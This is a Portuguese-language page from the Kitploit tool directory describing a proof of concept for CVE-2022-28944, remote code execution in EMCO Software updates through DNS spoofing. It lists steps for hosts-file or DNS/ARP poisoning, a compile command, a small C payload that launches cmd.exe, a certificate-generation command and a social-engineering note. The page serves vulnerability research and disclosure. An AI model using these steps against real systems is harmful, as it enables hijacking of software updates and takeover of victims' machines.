Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2022-28944 — Prova de conceito para execução remota de código não autenticada em produtos da EMCO Software via spoofing de DNS e injeção de atualização maliciosa. | Kitploit
Ferramentas/GitHubGitHub/gar-re/cve-2022-28944
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubgar-re/cve-2022-28944

cve-2022-28944

Prova de conceito para execução remota de código não autenticada em produtos da EMCO Software via spoofing de DNS e injeção de atualização maliciosa.

Ver Repositório
413há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-28944

Vulnerabilidade de Execução Remota de Código sem Autenticação em Atualização de Múltiplos Produtos do EMCO Software.

Uso: python3 cve-2022-28944_poc.py

Detalhes no relatório em gerr.re.

Passos para reproduzir

  1. Instale um produto afetado do EMCO Software;
  2. Defina o spoof storage.emcosoftware.com para o IP do atacante;
    • Para uma prova de conceito edite c:\windows\system32\drivers\etc\hosts no alvo.
      • Nota: atacantes podem, por exemplo, usar:
        • roteadores/switches/DNS mal configurados,
        • spoof de DNS / envenenamento de cache,
        • spoof de ARP / envenenamento de cache.
  3. Compile proof.c no atacante, por exemplo, usando i686-w64-mingw32-gcc proof.c -o proof.exe;
root@kitploit:~
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
  1. Gere certificados autoassinados;
    • por exemplo, usando openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
  2. Execute o script de prova de conceito;
  3. Inicie o produto afetado do EMCO Software e então
    • aguarde um dia para disparar a atualização automaticamente, ou
    • dispare a atualização manualmente pelo menu do aplicativo;
  4. Aceite a atualização no Assistente de Atualização.
    • Atacantes usarão uma descrição de atualização persuasiva para convencer um alvo a aceitar a atualização.
Baixar ferramenta